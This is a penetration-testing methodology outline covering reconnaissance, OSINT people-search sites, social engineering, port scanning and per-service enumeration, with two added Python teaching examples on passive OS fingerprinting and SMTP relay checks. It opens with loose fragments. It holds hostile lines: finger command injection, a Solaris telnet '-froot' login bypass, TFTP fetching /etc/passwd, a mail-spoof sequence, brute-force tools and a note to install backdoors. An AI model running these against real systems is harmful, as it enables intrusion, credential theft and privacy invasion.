1. X11 port 6000+ open
1.1. X11 Enumeration
1.1.1. List open windows
1.1.2. Authentication Method
1.1.2.1. Xauth
1.1.2.2. Xhost
1.2. X11 Exploitation
1.2.1. xwd
1.2.1.1. xwd -display 192.168.0.1:0 -root -out 192.168.0.1.xpm
1.2.2. Keystrokes
1.2.2.1. Received
1.2.2.2. Transmitted
1.2.3. Screenshots
1.2.4. xhost +
1.3. Examine Configuration Files
1.3.1. /etc/Xn.hosts
1.3.2. /usr/lib/X11/xdm
1.3.3. /usr/lib/X11/xdm/xsession
1.3.4. /usr/lib/X11/xdm/xsession-remote
1.3.5. /usr/lib/X11/xdm/xsession.0
1.3.6. /usr/lib/X11/xdm/xdm-config
1.3.6.1. DisplayManager*authorize:on
2. pwdump [-h][-o][-u][-p] machineName
3. Nabil contributed the AS/400 section.
4. Client Side Security
5. Back end files
5.1. .exe / .txt / .doc / .ppt / .pdf / .vbs / .pl / .sh / .bat / .sql / .xls / .mdb / .conf
6. Set objShell = CreateObject("WScript.Shell")
7. Check visible areas for sensitive information.
8. InitialProgram=c:\windows\system32\cmd.exe
9. txdns --verbose -fm wordlist.dic --server ip_address -rr SOA domain_name -h c:\hostlist.txt
10. http://secunia.com/advisories/search/?search=citrix
11. Pre-Inspection Visit - template
12. Network Footprinting (Reconnaissance) The tester would attempt to gather as much information as possible about the selected network. Reconnaissance can take two forms i.e. active and passive. A passive attack is always the best starting point as this would normally defeat intrusion detection systems and other forms of protection etc. afforded to the network. This would usually involve trying to discover publicly available information by utilising a web browser and visiting newsgroups etc. An active form would be more intrusive and may show up in audit logs and may take the form of an attempted DNS zone transfer or a social engineering type of attack.
12.1. Untitled
12.1.1. Authoritative Bodies
12.1.1.1. IANA - Internet Assigned Numbers Authority
12.1.1.2. ICANN - Internet Corporation for Assigned Names and Numbers.
12.1.1.3. NRO - Number Resource Organisation
12.1.1.4. RIR - Regional Internet Registry
12.1.1.4.1. AFRINIC - African Network Information Centre
12.1.1.4.2. APNIC - Asia Pacific Network Information Centre
12.1.1.4.3. ARIN - American Registry for Internet Numbers
12.1.1.4.4. LACNIC - Latin America & Caribbean Network Information Centre
12.1.1.4.5. RIPE NCC - Réseaux IP Européens Network Coordination Centre
12.1.2. Websites
12.1.2.1. Central Ops
12.1.2.1.1. Domain Dossier
12.1.2.1.2. Email Dossier
12.1.2.2. DNS Stuff
12.1.2.2.1. Online DNS one-stop shop, with the ability to perform a great deal of disparate DNS type queries.
12.1.2.3. Fixed Orbit
12.1.2.3.1. Autonomous System lookups and other online tools available.
12.1.2.4. Geektools
12.1.2.5. IP2Location
12.1.2.5.1. Allows limited free IP lookups to be performed, displaying geolocation information, ISP details and other pertinent information.
12.1.2.6. Kartoo
12.1.2.6.1. Metasearch engine that visually presents its results.
12.1.2.7. MyIPNeighbors.com
12.1.2.7.1. Excellent site that gives details of the domains sharing the IP address queried and, conversely, resolves IP addresses to DNS names
12.1.2.8. My-IP-Neighbors.com
12.1.2.8.1. Excellent site that can be used if the above is down
12.1.2.9. myipneighbors.net
12.1.2.10. Netcraft
12.1.2.10.1. Online search tool allowing queries for host information.
12.1.2.11. Passive DNS Replication
12.1.2.11.1. Finds shared domains based on supplied IP addresses
12.1.2.11.2. Note: website utilised by the nmap hostmap.nse script
12.1.2.12. Robtex
12.1.2.12.1. Excellent website allowing DNS and AS lookups to be performed with a graphical display of the results with pointers, A, MX records and AS connectivity displayed.
12.1.2.12.2. Note: can be unreliable with old entries (use CentralOps to verify)
12.1.2.13. Traceroute.org
12.1.2.13.1. Website listing a large number of links to online traceroute resources.
12.1.2.14. Wayback Machine
12.1.2.14.1. Stores older versions of websites, making it a good comparison tool and excellent resource for previously removed data.
12.1.2.15. Whois.net
12.1.3. Tools
12.1.3.1. Cheops-ng
12.1.3.2. Country whois
12.1.3.3. Domain Research Tool
12.1.3.4. Firefox Plugins
12.1.3.4.1. AS Number
12.1.3.4.2. Shazou
12.1.3.4.3. Firecat Suite
12.1.3.5. Gnetutil
12.1.3.6. Goolag Scanner
12.1.3.7. Greenwich
12.1.3.8. Maltego
12.1.3.9. GTWhois
12.1.3.10. Sam Spade
12.1.3.11. Smart whois
12.1.3.12. SpiderFoot
12.2. Internet Search
12.2.1. General Information
12.2.1.1. Web Investigator
12.2.1.2. Tracesmart
12.2.1.3. Friends Reunited
12.2.1.4. Ebay - profiles etc.
12.2.2. Financial
12.2.2.1. EDGAR - Company information, including real-time filings. US
12.2.2.2. Google Finance - General Finance Portal
12.2.2.3. Hoovers - Business Intelligence, Insight and Results. US and UK
12.2.2.4. Companies House UK
12.2.2.5. Land Registry UK
12.2.3. Phone book/ Electoral Roll Information
12.2.3.1. 123people
12.2.3.1.1. http://www.123people.co.uk/s/firstname+lastname/world
12.2.3.2. 192.com
12.2.3.2.1. Electoral Roll Search. UK
12.2.3.3. 411
12.2.3.3.1. Online White Pages and Yellow Pages. US
12.2.3.4. Untitled
12.2.3.4.1. Background Check, Phone Number Lookup, Trace email, Criminal record, Find People, cell phone number search, License Plate Search. US
12.2.3.5. BT.com. UK
12.2.3.5.1. Residential
12.2.3.5.2. Business
12.2.3.6. Pipl
12.2.3.6.2. http://pipl.com/search/?Email=john%40example.com&CategoryID=4&Interface=1
12.2.3.6.3. http://pipl.com/search/?Username=????&CategoryID=5&Interface=1
12.2.3.7. Spokeo
12.2.3.7.1. http://www.spokeo.com/user?q=domain_name
12.2.3.7.2. http://www.spokeo.com/user?q=email_address
12.2.3.8. Yasni
12.2.3.8.1. http://www.yasni.co.uk/index.php?action=search&search=1&sh=&name=firstname+lastname&filter=Keyword
12.2.3.9. Zabasearch
12.2.3.9.1. People Search Engine. US
12.2.4. Generic Web Searching
12.2.4.1. Code Search
12.2.4.2. Forum Entries
12.2.4.3. Google Hacking Database
12.2.4.4. Google
12.2.4.4.1. Email Addresses
12.2.4.4.2. Contact Details
12.2.4.5. Newsgroups/forums
12.2.4.6. Blog Search
12.2.4.6.1. Yammer
12.2.4.6.2. Google Blog Search
12.2.4.6.3. Technorati
12.2.4.6.4. Jaiku
12.2.4.6.5. Present.ly
12.2.4.6.6. Twitter Network Browser
12.2.4.7. Search Engine Comparison/ Aggregator Sites
12.2.4.7.1. Clusty
12.2.4.7.2. Grokker
12.2.4.7.3. Zuula
12.2.4.7.4. Exalead
12.2.4.7.5. Delicious
12.2.5. Metadata Search
12.2.5.1. Untitled
12.2.5.1.1. MetaData Visualisation Sites
12.2.5.1.2. Tools
12.2.5.1.3. Wikipedia Metadata Search
12.2.6. Social/ Business Networks
12.2.6.1. Untitled
12.2.6.1.1. Africa
12.2.6.1.2. Australia
12.2.6.1.3. Belgium
12.2.6.1.4. Holland
12.2.6.1.5. Hungary
12.2.6.1.6. Iran
12.2.6.1.7. Japan
12.2.6.1.8. Korea
12.2.6.1.9. Poland
12.2.6.1.10. Russia
12.2.6.1.11. Sweden
12.2.6.1.12. UK
12.2.6.1.13. US
12.2.6.1.14. Assorted
12.2.7. Resources
12.2.7.1. OSINT
12.2.7.2. International Directory of Search Engines
12.3. DNS Record Retrieval from publicly available servers
12.3.1. Types of Information Records
12.3.1.1. SOA Records - Indicates the server that has authority for the domain.
12.3.1.2. MX Records - List of a host’s or domain’s mail exchanger server(s).
12.3.1.3. NS Records - List of a host’s or domain’s name server(s).
12.3.1.4. A Records - An address record that allows a computer name to be translated to an IP address. Each computer has to have this record for its IP address to be located via DNS.
12.3.1.5. PTR Records - Reverse lookup record; maps an IP address back to the host's domain name.
12.3.1.6. SRV Records - Service location record.
12.3.1.7. HINFO Records - Host information record with CPU type and operating system.
12.3.1.8. TXT Records - Generic text record.
12.3.1.9. CNAME - Canonical name record; allows additional names/ aliases to be used to locate a computer.
12.3.1.10. RP - Responsible person for the domain.
12.3.2. Database Settings
12.3.2.1. Version.bind
12.3.2.2. Serial
12.3.2.3. Refresh
12.3.2.4. Retry
12.3.2.5. Expiry
12.3.2.6. Minimum
12.3.3. Sub Domains
12.3.4. Internal IP ranges
12.3.4.1. Reverse DNS for IP Range
12.3.5. Zone Transfer
12.4. Social Engineering
12.4.1. Remote
12.4.1.1. Phone
12.4.1.1.1. Scenarios
12.4.1.1.2. Results
12.4.1.1.3. Contact Details
12.4.1.2. Email
12.4.1.2.1. Scenarios
12.4.1.2.2. Software
12.4.1.2.3. Results
12.4.1.2.4. Contact Details
12.4.1.3. Other
12.4.2. Local
12.4.2.1. Personas
12.4.2.1.1. Name
12.4.2.1.2. Phone
12.4.2.1.3. Email
12.4.2.1.4. Business Cards
12.4.2.2. Contact Details
12.4.2.2.1. Name
12.4.2.2.2. Phone number
12.4.2.2.3. Email
12.4.2.2.4. Room number
12.4.2.2.5. Department
12.4.2.2.6. Role
12.4.2.3. Scenarios
12.4.2.3.1. New IT employee
12.4.2.3.2. Fire Inspector
12.4.2.4. Results
12.4.2.5. Maps
12.4.2.5.1. Satellite Imagery
12.4.2.5.2. Building layouts
12.4.2.6. Other
12.5. Dumpster Diving
12.5.1. Rubbish Bins
12.5.2. Contract Waste Removal
12.5.3. eBay ex-stock sales, e.g. HDDs
12.6. Web Site copy
12.6.1. httrack
12.6.2. teleport pro
12.6.3. Black Widow
13. Discovery & Probing. Enumeration can serve two distinct purposes in an assessment: OS fingerprinting, and identifying the remote applications being served. OS fingerprinting, or TCP/IP stack fingerprinting, is the process of determining the operating system in use on a remote host. It is carried out by analysing packets received from the host in question. There are two distinct ways to OS fingerprint: actively (i.e. nmap) or passively (i.e. scanrand). Passive OS fingerprinting determines the remote OS from the packets received only and does not require any packets to be sent. Active OS fingerprinting is very noisy: it requires packets to be sent to the remote host and waits for a reply (or the lack of one). Different OSes respond differently to certain types of packet (the response is governed by an RFC plus any proprietary responses the vendor, notably Microsoft, has enabled within the system), so custom packets may be sent. The remote applications being served on a host can be determined from the open ports on that host. By port scanning it is then possible to build up a picture of what applications are running and tailor the test accordingly.
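The passive approach described above, as an added example that is not part of the original framework: a small Python heuristic that infers the likely initial TTL, the hop distance and a coarse OS family from attributes of packets already received, without sending anything. The signature table, the field names and the sample packets are constructed simplifications for illustration, not a real fingerprint database; production tools such as p0f compare many more header fields and exact TCP option layouts.

```python
# Added example, not code from the original framework: a minimal passive
# OS-fingerprint heuristic. It reads only attributes of packets that were
# already received and sends no probes, which is why this approach leaves no
# trace in the remote host's logs (and why active probing does).
from dataclasses import dataclass

# Initial TTL values used by the major OS families (simplified assumption).
INITIAL_TTLS = (64, 128, 255)

# Constructed, simplified signatures: (initial_ttl, syn_window) -> OS family.
# Assumption for illustration only; real fingerprinters use far richer data.
SIGNATURES = {
    (64, 65535): "BSD-like (FreeBSD/OpenBSD/macOS)",
    (64, 29200): "Linux",
    (64, 5840): "Linux (older 2.x kernel)",
    (128, 8192): "Windows",
    (128, 65535): "Windows (newer)",
    (255, 4128): "Cisco IOS",
}


@dataclass
class PacketSummary:
    """The few header fields this heuristic needs (constructed input format)."""
    src: str
    ttl: int       # TTL as observed on arrival
    window: int    # TCP window size
    syn: bool      # only a SYN carries the sender's initial window


def guess_initial_ttl(observed_ttl: int) -> int:
    """Smallest common initial TTL that is >= the observed TTL.

    A packet cannot gain TTL in transit, so the sender's initial value is the
    next common default at or above what we see.
    """
    for candidate in INITIAL_TTLS:
        if observed_ttl <= candidate:
            return candidate
    return INITIAL_TTLS[-1]


def hop_distance(observed_ttl: int) -> int:
    """Estimated number of routers between the sender and us."""
    return guess_initial_ttl(observed_ttl) - observed_ttl


def fingerprint(pkt: PacketSummary) -> dict:
    """Infer initial TTL, hop distance and OS family for one packet."""
    init_ttl = guess_initial_ttl(pkt.ttl)
    if not pkt.syn:
        family = "unknown (need a SYN to read the initial window)"
    else:
        family = SIGNATURES.get((init_ttl, pkt.window), "unknown")
    return {
        "src": pkt.src,
        "initial_ttl": init_ttl,
        "hops": hop_distance(pkt.ttl),
        "os_family": family,
    }


def fingerprint_all(packets) -> list:
    return [fingerprint(p) for p in packets]


# Constructed sample traffic (not captured from any real host).
SAMPLE_PACKETS = [
    PacketSummary("10.0.0.5", ttl=57, window=29200, syn=True),
    PacketSummary("10.0.0.9", ttl=120, window=8192, syn=True),
    PacketSummary("10.0.0.1", ttl=250, window=4128, syn=True),
    PacketSummary("10.0.0.7", ttl=61, window=501, syn=False),
]

if __name__ == "__main__":
    for result in fingerprint_all(SAMPLE_PACKETS):
        print(result)
```

The TTL arithmetic is the part worth internalising: because TTL only decreases, an observed value of 57 almost certainly started at 64 and crossed 7 routers, and this single field already narrows the OS family before any window or option analysis. The same reasoning lets a defender reading firewall logs sanity-check whether a source claiming to be on the local segment is really one hop away.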
13.1. Default Port Lists
13.1.1. Windows
13.1.2. *nix
13.2. Enumeration tools and techniques - The vast majority can be used generically; however, certain bespoke applications require their own specific toolsets. Default passwords are platform and vendor specific.
13.2.1. General Enumeration Tools
13.2.1.1. nmap
13.2.1.1.1. nmap -n -A -PN -p- -T Aggressive -iL nmap.targetlist -oX nmap.syn.results.xml
13.2.1.1.2. nmap -sU -PN -v -O -p 1-30000 -T polite -iL nmap.targetlist > nmap.udp.results
13.2.1.1.3. nmap -sV -PN -v -p 21,22,23,25,53,80,443,161 -iL nmap.targets > nmap.version.results
13.2.1.1.4. nmap -A -sS -PN -n --script:all ip_address --reason
13.2.1.1.5. grep "appears to be up" nmap_saved_filename | awk -F\( '{print $2}' | awk -F\) '{print $1}' > ip_list
13.2.1.2. netcat
13.2.1.2.1. nc -v -n IP_Address port
13.2.1.2.2. nc -v -w 2 -z IP_Address port_range/port_number
13.2.1.3. amap
13.2.1.3.1. amap -bqv 192.168.1.1 80
13.2.1.3.2. amap [-A|-B|-P|-W] [-1buSRHUdqv] [[-m] -o <file>] [-D <file>] [-t/-T sec] [-c cons] [-C retries] [-p proto] [-i <file>] [target port [port] ...]
13.2.1.4. xprobe2
13.2.1.4.1. xprobe2 192.168.1.1
13.2.1.5. sinfp
13.2.1.5.1. ./sinfp.pl -i -p
13.2.1.6. nbtscan
13.2.1.6.1. nbtscan [-v] [-d] [-e] [-l] [-t timeout] [-b bandwidth] [-r] [-q] [-s separator] [-m retransmits] (-f filename) | (<scan_range>)
13.2.1.7. hping
13.2.1.7.1. hping ip_address
13.2.1.8. scanrand
13.2.1.8.1. scanrand ip_address:all
13.2.1.9. unicornscan
13.2.1.9.1. unicornscan [options `b:B:d:De:EFhi:L:m:M:pP:q:r:R:s:St:T:w:W:vVZ:' ] IP_ADDRESS/ CIDR_NET_MASK: S-E
13.2.1.10. netenum
13.2.1.10.1. netenum network/netmask timeout
13.2.1.11. fping
13.2.1.11.1. fping -a -d hostname/ (Network/Subnet_Mask)
13.2.2. Firewall Specific Tools
13.2.2.1. firewalk
13.2.2.1.1. firewalk -p [protocol] -d [destination_port] -s [source_port] [internal_IP] [gateway_IP]
13.2.2.2. ftester
13.2.2.2.1. Host 1: ./ftestd -i eth0 -v; Host 2: ./ftest -f ftest.conf -v -d 0.01; then ./freport ftest.log ftestd.log
13.2.3. Default Passwords (Examine list)
13.2.3.1. Passwords A
13.2.3.2. Passwords B
13.2.3.3. Passwords C
13.2.3.4. Passwords D
13.2.3.5. Passwords E
13.2.3.6. Passwords F
13.2.3.7. Passwords G
13.2.3.8. Passwords H
13.2.3.9. Passwords I
13.2.3.10. Passwords J
13.2.3.11. Passwords K
13.2.3.12. Passwords L
13.2.3.13. Passwords M
13.2.3.14. Passwords N
13.2.3.15. Passwords O
13.2.3.16. Passwords P
13.2.3.17. Passwords R
13.2.3.18. Passwords S
13.2.3.19. Passwords T
13.2.3.20. Passwords U
13.2.3.21. Passwords V
13.2.3.22. Passwords W
13.2.3.23. Passwords X
13.2.3.24. Passwords Y
13.2.3.25. Passwords Z
13.2.3.26. Passwords (Numeric)
13.3. Active Hosts
13.3.1. Open TCP Ports
13.3.2. Closed TCP Ports
13.3.3. Open UDP Ports
13.3.4. Closed UDP Ports
13.3.5. Service Probing
13.3.5.1. SMTP Mail Bouncing
13.3.5.2. Banner Grabbing
13.3.5.2.1. Other
13.3.5.2.2. HTTP
13.3.5.2.3. HTTPS
13.3.5.2.4. SMTP
13.3.5.2.5. POP3
13.3.5.2.6. FTP
13.3.6. ICMP Responses
13.3.6.1. Type 3 (Port Unreachable)
13.3.6.2. Type 8 (Echo Request)
13.3.6.3. Type 13 (Timestamp Request)
13.3.6.4. Type 15 (Information Request)
13.3.6.5. Type 17 (Subnet Address Mask Request)
13.3.6.6. Responses from broadcast address
13.3.7. Source Port Scans
13.3.7.1. TCP/UDP 53 (DNS)
13.3.7.2. TCP 20 (FTP Data)
13.3.7.3. TCP 80 (HTTP)
13.3.7.4. TCP/UDP 88 (Kerberos)
13.3.8. Firewall Assessment
13.3.8.1. Firewalk
13.3.8.2. TCP/UDP/ICMP responses
13.3.9. OS Fingerprint
14. Enumeration
14.1. Daytime port 13 open
14.1.1. nmap nse script
14.1.1.1. daytime
14.2. FTP port 21 open
14.2.1. Fingerprint server
14.2.1.1. telnet ip_address 21 (Banner grab)
14.2.1.2. Run command ftp ip_address
14.2.1.3. [email protected]
14.2.1.4. Check for anonymous access
14.2.1.4.1. ftp ip_address (Username: anonymous OR anon; Password: [email protected])
14.2.2. Password guessing
14.2.2.1. Hydra brute force
14.2.2.2. medusa
14.2.2.3. Brutus
14.2.3. Examine configuration files
14.2.3.1. ftpusers
14.2.3.2. ftp.conf
14.2.3.3. proftpd.conf
14.2.4. MiTM
14.2.4.1. pasvagg.pl
14.3. SSH port 22 open
14.3.1. Fingerprint server
14.3.1.1. telnet ip_address 22 (banner grab)
14.3.1.2. scanssh
14.3.1.2.1. scanssh -p -r -e excludes random(no.)/Network_ID/Subnet_Mask
14.3.2. Password guessing
14.3.2.1. ssh root@ip_address
14.3.2.2. guess-who
14.3.2.2.1. ./b -l username -h ip_address -p 22 -2 < password_file_location
14.3.2.3. Hydra brute force
14.3.2.4. brutessh
14.3.2.5. Ruby SSH Bruteforcer
14.3.3. Examine configuration files
14.3.3.1. ssh_config
14.3.3.2. sshd_config
14.3.3.3. authorized_keys
14.3.3.4. ssh_known_hosts
14.3.3.5. .shosts
14.3.4. SSH Client programs
14.3.4.1. tunnelier
14.3.4.2. winsshd
14.3.4.3. putty
14.3.4.4. winscp
14.4. Telnet port 23 open
14.4.1. Fingerprint server
14.4.1.1. telnet ip_address
14.4.1.1.1. Common Banner List (OS - Banner)
    Solaris 8 - SunOS 5.8
    Solaris 2.6 - SunOS 5.6
    Solaris 2.4 or 2.5.1 - Unix(r) System V Release 4.0 (hostname)
    SunOS 4.1.x - SunOS Unix (hostname)
    FreeBSD - FreeBSD/i386 (hostname) (ttyp1)
    NetBSD - NetBSD/i386 (hostname) (ttyp1)
    OpenBSD - OpenBSD/i386 (hostname) (ttyp1)
    Red Hat 8.0 - Red Hat Linux release 8.0 (Psyche)
    Debian 3.0 - Debian GNU/Linux 3.0 / hostname
    SGI IRIX 6.x - IRIX (hostname)
    IBM AIX 4.1.x - AIX Version 4 (C) Copyrights by IBM and by others 1982, 1994.
    IBM AIX 4.2.x or 4.3.x - AIX Version 4 (C) Copyrights by IBM and by others 1982, 1996.
    Nokia IPSO - IPSO (hostname) (ttyp0)
    Cisco IOS - User Access Verification
    Livingston ComOS - ComOS - Livingston PortMaster
14.4.1.2. telnetfp
14.4.2. Password Attack
14.4.2.2. Hydra brute force
14.4.2.3. Brutus
14.4.2.4. telnet -l "-froot" hostname (Solaris 10+)
14.4.3. Examine configuration files
14.4.3.1. /etc/inetd.conf
14.4.3.2. /etc/xinetd.d/telnet
14.4.3.3. /etc/xinetd.d/stelnet
14.5. Sendmail Port 25 open
14.5.1. Fingerprint server
14.5.1.1. telnet ip_address 25 (banner grab)
14.5.2. Mail Server Testing
14.5.2.1. Enumerate users
14.5.2.1.1. VRFY username (verifies if username exists - enumeration of accounts)
14.5.2.1.2. EXPN username (verifies if username is valid - enumeration of accounts)
14.5.2.2. Mail Spoof Test
14.5.2.2.1. HELO anything
    MAIL FROM: spoofed_address
    RCPT TO: valid_mail_account
    DATA
    .
    QUIT
14.5.2.3. Mail Relay Test
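The spoof and relay tests above, modelled as an added example that is not part of the original framework: a tiny in-memory SMTP server that answers the client's commands the way a real MTA would, so both sides of the session and the expected reply codes can be seen offline. The local domain, the trusted relay network, the hostname in the greeting and the reply texts are constructed assumptions; real servers word their replies differently.

```python
# Added example, not code from the original framework: a minimal model of the
# decisions an SMTP server makes during the spoof and relay tests. It shows
# why the spoof test succeeds on a server without sender checks (SMTP itself
# never verifies MAIL FROM) and what separates an open relay from a correctly
# configured one (RCPT TO is only accepted for local domains or trusted nets).
import ipaddress

LOCAL_DOMAINS = {"example.com"}                           # constructed
RELAY_NETWORKS = [ipaddress.ip_network("10.0.0.0/8")]     # constructed


class MiniSmtp:
    def __init__(self, client_ip: str, open_relay: bool = False):
        self.client_ip = ipaddress.ip_address(client_ip)
        self.open_relay = open_relay   # the misconfiguration the relay test looks for
        self.helo = None
        self.mail_from = None
        self.rcpts = []

    def _may_relay(self) -> bool:
        """Relaying to foreign domains is allowed only for trusted networks."""
        return self.open_relay or any(self.client_ip in net for net in RELAY_NETWORKS)

    def handle(self, line: str) -> str:
        verb, _, arg = line.strip().partition(" ")
        verb = verb.upper()
        if verb == "HELO":
            self.helo = arg
            return "250 mail.example.com"
        if verb == "MAIL":
            # SMTP does not authenticate the envelope sender; only policy layers
            # (SPF/DKIM/DMARC on the receiving side) can catch a spoofed address.
            self.mail_from = arg.partition(":")[2].strip().strip("<>")
            return "250 2.1.0 Sender ok"
        if verb == "RCPT":
            rcpt = arg.partition(":")[2].strip().strip("<>")
            domain = rcpt.rsplit("@", 1)[-1].lower()
            if domain in LOCAL_DOMAINS or self._may_relay():
                self.rcpts.append(rcpt)
                return "250 2.1.5 Recipient ok"
            return "554 5.7.1 Relay access denied"
        if verb == "DATA":
            return "354 End data with <CR><LF>.<CR><LF>" if self.rcpts else "503 5.5.1 Need RCPT"
        if verb == ".":
            return "250 2.0.0 Message accepted"
        if verb == "QUIT":
            return "221 2.0.0 Bye"
        return "500 5.5.2 Command not recognized"


def run_session(client_ip: str, commands, open_relay: bool = False) -> list:
    """Feed the client's commands in order; return (command, reply) pairs."""
    server = MiniSmtp(client_ip, open_relay)
    return [(cmd, server.handle(cmd)) for cmd in commands]


def spoof_test(client_ip: str) -> bool:
    """True if a forged sender is accepted for a local recipient."""
    replies = run_session(client_ip, [
        "HELO anything",
        "MAIL FROM: <ceo@example.com>",     # constructed spoofed address
        "RCPT TO: <user@example.com>",
        "DATA",
        ".",
        "QUIT",
    ])
    return replies[4][1].startswith("250")


def relay_test(client_ip: str, open_relay: bool = False) -> bool:
    """True if the client may send to a recipient in a foreign domain."""
    replies = run_session(client_ip, [
        "HELO anything",
        "MAIL FROM: <someone@outside.org>",
        "RCPT TO: <target@elsewhere.net>",
    ], open_relay)
    return replies[-1][1].startswith("250")


if __name__ == "__main__":
    for cmd, reply in run_session("203.0.113.5", ["HELO x", "MAIL FROM: <a@b>", "RCPT TO: <c@elsewhere.net>", "QUIT"]):
        print(f"C: {cmd}\nS: {reply}")
```

The reply to RCPT TO is the whole relay test: a 250 for a recipient outside the server's own domains from an untrusted source means the server will relay for anyone, while 554 means the relay restriction is in place. The spoof test, by contrast, almost always "succeeds" at the SMTP layer, which is why the finding belongs with sender-policy (SPF/DMARC) checks rather than with the MTA's relay configuration.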
14.5.3. Examine Configuration Files
14.5.3.1. sendmail.cf
14.5.3.2. submit.cf
14.6. DNS port 53 open
14.6.1. Fingerprint server/ service
14.6.1.1. host
14.6.1.1.1. host [-aCdlnrTwv] [-c class] [-N ndots] [-R number] [-t type] [-W wait] name [server]
    -v verbose format
    -t (query type) Allows a user to specify a record type i.e. A, NS, or PTR.
    -a Same as -t ANY.
    -l Zone transfer (if allowed).
    -f Save to a specified filename.
14.6.1.2. nslookup
14.6.1.2.1. nslookup [ -option ... ] [ host-to-find | - [ server ]]
14.6.1.3. dig
14.6.1.3.1. dig [ @server ] [-b address ] [-c class ] [-f filename ] [-k filename ] [-p port# ] [-t type ] [-x addr ] [-y name:key ] [-4 ] [-6 ] [name ] [type ] [class ] [queryopt... ]
14.6.1.4. whois
    -h Use the named host to resolve the query
    -a Use ARIN to resolve the query
    -r Use RIPE to resolve the query
    -p Use APNIC to resolve the query
    -Q Perform a quick lookup
14.6.2. DNS Enumeration
14.6.2.1. Bile Suite
14.6.2.1.1. perl BiLE.pl [website] [project_name]
14.6.2.1.2. perl BiLE-weigh.pl [website] [input file]
14.6.2.1.3. perl vet-IPrange.pl [input file] [true domain file] [output file] <range>
14.6.2.1.4. perl vet-mx.pl [input file] [true domain file] [output file]
14.6.2.1.5. perl exp-tld.pl [input file] [output file]
14.6.2.1.6. perl jarf-dnsbrute [domain_name] (brutelevel) [file_with_names]
14.6.2.1.7. perl qtrace.pl [ip_address_file] [output_file]
14.6.2.1.8. perl jarf-rev [subnetblock] [nameserver]
14.6.2.2. txdns
14.6.2.2.1. txdns -rt -t domain_name
14.6.2.2.2. txdns -x 50 -bb domain_name
14.6.2.3. nmap nse scripts
14.6.2.3.1. dns-random-srcport
14.6.2.3.2. dns-random-txid
14.6.2.3.3. dns-recursion
14.6.2.3.4. dns-zone-transfer
14.6.3. Examine Configuration Files
14.6.3.1. host.conf
14.6.3.2. resolv.conf
14.6.3.3. named.conf
14.7. TFTP port 69 open
14.7.1. TFTP Enumeration
14.7.1.1. tftp ip_address PUT local_file
14.7.1.2. tftp ip_address GET conf.txt (or other files)
14.7.1.3. Solarwinds TFTP server
14.7.1.4. tftp -i <IP> GET /etc/passwd (old Solaris)
14.7.2. TFTP Bruteforcing
14.7.2.1. TFTP bruteforcer
14.7.2.2. Cisco-Torch
14.8. Finger Port 79 open
14.8.1. User enumeration
14.8.1.1. finger 'a b c d e f g h' @example.com
14.8.1.2. finger [email protected]
14.8.1.3. finger [email protected]
14.8.1.4. finger [email protected]
14.8.1.5. finger [email protected]
14.8.1.6. finger **@example.com
14.8.1.7. finger [email protected]
14.8.1.8. finger @example.com
14.8.1.9. nmap nse script
14.8.1.9.1. finger
14.8.2. Command execution
14.8.2.1. finger "|/bin/[email protected]"
14.8.2.2. finger "|/bin/ls -a /@example.com"
14.8.3. Finger Bounce
14.8.3.1. finger user@host@victim
14.8.3.2. finger @internal@external
14.9. Web Ports 80,8080 etc. open
14.9.1. Fingerprint server
14.9.1.1. Telnet ip_address port
14.9.1.2. Firefox plugins
14.9.1.2.1. All
14.9.1.2.2. Specific
14.9.2. Crawl website
14.9.2.1. lynx [options] startfile/URL (options include -traversal, -crawl, -dump, -image_links, -source)
14.9.2.2. httprint
14.9.2.3. Metagoofil
14.9.2.3.1. metagoofil.py -d [domain] -l [no. of] -f [type] -o results.html
14.9.3. Web Directory enumeration
14.9.3.1. Nikto
14.9.3.1.1. nikto [-h target] [options]
14.9.3.2. DirBuster
14.9.3.3. Wikto
14.9.3.4. Goolag Scanner
14.9.4. Vulnerability Assessment
14.9.4.1. Manual Tests
14.9.4.1.1. Default Passwords
14.9.4.1.2. Install Backdoors
14.9.4.1.3. Method Testing
14.9.4.1.4. Upload Files
14.9.4.1.5. View Page Source
14.9.4.1.6. Input Validation Checks
14.9.4.1.7. Automated table and column iteration
14.9.4.2. Vulnerability Scanners
14.9.4.2.1. Acunetix
14.9.4.2.2. Grendelscan
14.9.4.2.3. NStealth
14.9.4.2.4. Obiwan III
14.9.4.2.5. w3af
14.9.4.3. Specific Applications/ Server Tools
14.9.4.3.1. Domino
14.9.4.3.2. Joomla
14.9.4.3.3. aspaudit.pl
14.9.4.3.4. Vbulletin
14.9.4.3.5. ZyXel
14.9.5. Proxy Testing
14.9.5.1. Burpsuite
14.9.5.2. Crowbar
14.9.5.3. Interceptor
14.9.5.4. Paros
14.9.5.5. Requester Raw
14.9.5.6. Suru
14.9.5.7. WebScarab
14.9.6. Examine configuration files
14.9.6.1. Generic
14.9.6.1.1. Examine httpd.conf/ windows config files
14.9.6.2. JBoss
14.9.6.2.1. JMX Console http://<IP>:8080/jmx-console/
14.9.6.3. Joomla
14.9.6.3.1. configuration.php
14.9.6.3.2. diagnostics.php
14.9.6.3.3. joomla.inc.php
14.9.6.3.4. config.inc.php
14.9.6.4. Mambo
14.9.6.4.1. configuration.php
14.9.6.4.2. config.inc.php
14.9.6.5. Wordpress
14.9.6.5.1. setup-config.php
14.9.6.5.2. wp-config.php
14.9.6.6. ZyXel
14.9.6.6.1. /WAN.html (contains PPPoE ISP password)
14.9.6.6.2. /WLAN_General.html and /WLAN.html (contains WEP key)
14.9.6.6.3. /rpDyDNS.html (contains DDNS credentials)
14.9.6.6.4. /Firewall_DefPolicy.html (Firewall)
14.9.6.6.5. /CF_Keyword.html (Content Filter)
14.9.6.6.6. /RemMagWWW.html (Remote MGMT)
14.9.6.6.7. /rpSysAdmin.html (System)
14.9.6.6.8. /LAN_IP.html (LAN)
14.9.6.6.9. /NAT_General.html (NAT)
14.9.6.6.10. /ViewLog.html (Logs)
14.9.6.6.11. /rpFWUpload.html (Tools)
14.9.6.6.12. /DiagGeneral.html (Diagnostic)
14.9.6.6.13. /RemMagSNMP.html (SNMP Passwords)
14.9.6.6.14. /LAN_ClientList.html (Current DHCP Leases)
14.9.6.6.15. Config Backups
14.9.7. Examine web server logs
14.9.7.1. c:\winnt\system32\Logfiles\W3SVC1
14.9.7.1.1. awk -F " " '{print $3,$11}' filename | sort | uniq
14.9.8. References
14.9.8.1. White Papers
14.9.8.1.1. Cross Site Request Forgery: An Introduction to a Common Web Application Weakness
14.9.8.1.2. Attacking Web Service Security: Message Oriented Madness, XML Worms and Web Service Security Sanity
14.9.8.1.3. Blind Security Testing - An Evolutionary Approach
14.9.8.1.4. Command Injection in XML Signatures and Encryption
